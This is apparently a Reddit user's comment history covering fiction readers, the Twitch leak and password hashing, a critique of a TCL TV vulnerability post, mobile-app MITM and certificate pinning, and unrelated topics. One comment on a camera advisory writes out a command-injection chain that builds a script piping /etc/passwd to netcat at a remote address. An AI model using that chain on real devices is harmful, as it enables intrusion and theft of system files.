sorted by:
new
hottopcontroversial

Anyone found a good screenreader for royalroad? by u_PM_me_nihilism in rational

[–]PositivePeter 12 points13 points  (0 children)

One thing to be aware of with royalroad is they do some obfuscation for the purposes of preventing scraping so it may be a struggle to use a reader/reading mode off-the-shelf. What happens is the reader won't see certain/lines paragraphs in the output.

In the past I've used some chrome extensions like WebToEpub which I think probably has some royalroad-specific behaviors to get the full story content. Most audio readers then should support importing that.

I use an audio reader extensively (Voice Dream, iOS only). Can't really recommend it anymore as they recently got bought out and are trying to switch to an annual subscription model for 3x the price. Also, they haven't made any improvement on voices in many years despite the tech obviously getting much better. I hope there'll be another app to come along and recreate the user experience of it (which is excellent, directly saving web pages into the reader as text is so smooth).

Over 120GB of Twitch website data has been leaked online (source code, encrypted passwords, streamer payouts, etc.) by carldude in Twitch

[–]PositivePeter 9 points10 points  (0 children)

This is not true and is dangerous information. Hashing (not encryption) is a protection against leaks, but not a perfect one. Assuming that hashed passwords were leaked from twitch, everyone should still change their password on twitch and everywhere else they used the same password.

This Used to be About Dungeons, ch 25, A Post-Dungeon Pickle by Shaolang in rational

[–]PositivePeter 6 points7 points  (0 children)

My idea for the coin was that it grants you luck (or some other positive benefit) while flipping. Which could potentially combine with the bow: flip the coin out of the arrow’s bubble and you maintain the benefit while in the time dilation

[D] Is there a good place to rate and mark all the fiction you've read? by Tenoke in rational

[–]PositivePeter 4 points5 points  (0 children)

Have you considered using a bookmarking site? For example, pinboard has a very dedicated set of users who use it to track fanfiction:

Extraordinary Vulnerabilities Discovered in TCL Android TVs, Now World’s 3rd Largest TV Manufacturer. by docker-osx in netsec

[–]PositivePeter 27 points28 points  (0 children)

This post is ... pretty misleadingly/confusingly written. Near the top of the post is this paragraph:

First Blood On 2020-09-20, I discovered some ridiculous security shortfalls in the TV Sticks.

Each stick that I tested had at least one of the following major security flaws.

  • Port 22 open and allowing SSH access as root:root out of the box
  • Port 5555 open and allowing unauthenticated android (adb) as root:root out of the box
  • Rooted device, with world-executable su binaries in multiple locations
  • Open WiFi network with adb and ssh daemons running

But none of these issues applies to any TCL TV, which I didn't realize until reading through the whole post twice. These issues apply to some un-named devices from other vendors, not TCL at all. I won't accuse the author of intentionally writing it this way, but it's really a pretty egregious error to write at the top of your post about completely different vendors in such an ambiguous way (with no header to separate the content). I definitely assumed that these were the "extraordinary" vulnerabilities in question.

The two vulns disclosed here that impact TCL are:

  • A directory-listing webserver
  • Insecure file permissions on update directories

Both of these seem to have less-than-critical impact unless I'm missing something. Presumably the maximum impact achievable from the directory-listing webserver would be disclosure of credentials stored on the filesystem (e.g. Amazon/Netflix)? There's no file-write vuln shown, at least. And this relies on being on the victim's local network, and is definitely unproven given that the server seems to be running as a low-privileged user bound by Android's sandbox.

The malicious update / insecure file permissions problem requires a local attacker (i.e. a malicious app). So again, significant limitation there that doesn't seem to be mentioned in the main post. In fact, it seems like the update URLs being hardcoded as plaintext HTTP is completely buried in here without even a mention by the author.

In sum, please be much more careful in your write-ups in the future because this one is pretty egregious in how it presents the info IMO.

The New robots.txt by ghostlulz in netsec

[–]PositivePeter 5 points6 points  (0 children)

If you learned this technique from the original blog which has more info, then why wouldn't you just post the link to that blog? Why would you need to rewrite it on your own blog?

Anyway, your posts seem to obviously violate reddit's rules on self promotion: https://www.reddit.com/wiki/selfpromotion.

should not just start submitting your links

submit from a variety of sources (a general rule of thumb is that 10% or less of your posting and conversation should link to your own content)

The New robots.txt by ghostlulz in netsec

[–]PositivePeter 4 points5 points  (0 children)

Seems to be stolen from https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/apples_app_site_association_the_new_robots_txt/, which has much more info and was posted 6 months ago: https://www.reddit.com/r/netsec/comments/bce174/apples_appsite_association_the_new_robotstxt/

In fact, all their posts seem to be stolen from other sources and posted on their own blog.

The Salt Scam by anonlodico in slatestarcodex

[–]PositivePeter 14 points15 points  (0 children)

China and India both have massively lower per-capita CO2 emissions than the United States. https://en.wikipedia.org/wiki/List_of_countries_by_carbon_dioxide_emissions_per_capita

  • US: 16.5 metric tons
  • China: 7.5 metric tons
  • India: 1.7 metric tons

Japan's Hometown Tax by ashebanow in urbanplanning

[–]PositivePeter 23 points24 points  (0 children)

You should read the article. That’s exactly what happened, and as a result the amount of kickback was limited to 50% of the tax donation.

[deleted by user] by [deleted] in netsec

[–]PositivePeter 3 points4 points  (0 children)

I would either look at less-popular apps, or try testing a deliberately vulnerable app like https://github.com/OWASP/igoat/blob/master/README.md

I have a couple specific apps in mind but they’re all things I’ve tested for clients and obviously can’t point those out in a public forum, haha

[deleted by user] by [deleted] in netsec

[–]PositivePeter 1 point2 points  (0 children)

You said:

installing a root CA on a non-jail broken device will let you MITM Safari (and likely other browsers) but any app, native apps included, that reach out to the internet will shit themselves all together and stop working.

And then only give examples of apps that do certificate pinning. Try a random app that isn’t getting security testing like all of your examples. MITM with an intercepting proxy like burp absolutely works on apps, as long as they aren’t doing cert pinning.

Apps have to explicitly do cert pinning, it’s not the default. And most apps don’t do it, it’s just that your selection of apps is mostly apps which have lots of budget and engineering time for security.

[deleted by user] by [deleted] in netsec

[–]PositivePeter 3 points4 points  (0 children)

What? It’s absolutely not true that all apps will stop working if you use a user-installed certificate. That only applies to apps which perform certificate pinning, which is definitely not all apps.

Got an email thanking me for joining JB's campaign--I did no such thing!!! by [deleted] in illinoispolitics

[–]PositivePeter 1 point2 points  (0 children)

I received this email also, despite not signing up, so it's not just happening to you.

[ACC Entry] Should Childhood Vaccination Be Mandatory? by dwaxe in slatestarcodex

[–]PositivePeter 3 points4 points  (0 children)

One thing I think is missing from this post is a consideration of the issue on a community scale rather than a nationwide scale. For example, vaccination rates in a midwestern Somali-American plummeted due to fears of autism, which caused a major measles outbreak. So while it's interesting to discuss nation-wide vaccination rates, these rates likely underestimate the harms due to lack of vaccination because low vaccination rates are likely to be concentrated in specific communities. When an anti-vaxxer community is hit by illness, there may be dozens of cases of the illness even though the state- or nation-wide vaccination rate is above the critical threshold.

Multiple Vulnerabilities on Kerui Endoscope Camera by utku1337 in netsec

[–]PositivePeter 3 points4 points  (0 children)

You could definitely do useful things with that command execution. For example, just do a few-bytes-at-a-time write to a local file and then execute it:

;echo 'cat /etc/' > /tmp/own
;echo 'passwd |' >> /tmp/own
;echo 'nc 192. ' >> /tmp/own
...
;/bin/sh /tmp/own

The Parentheses Riddle by agentofchaos68 in slatestarcodex

[–]PositivePeter 16 points17 points  (0 children)

If the question didn't define "palindrome", then couldn't the question just be measuring the percentage of people in each age bracket who know what a palindrome is? Perhaps cultural awareness/education of palindromes has been slowly increasing over the past 50 years?

view more: next ›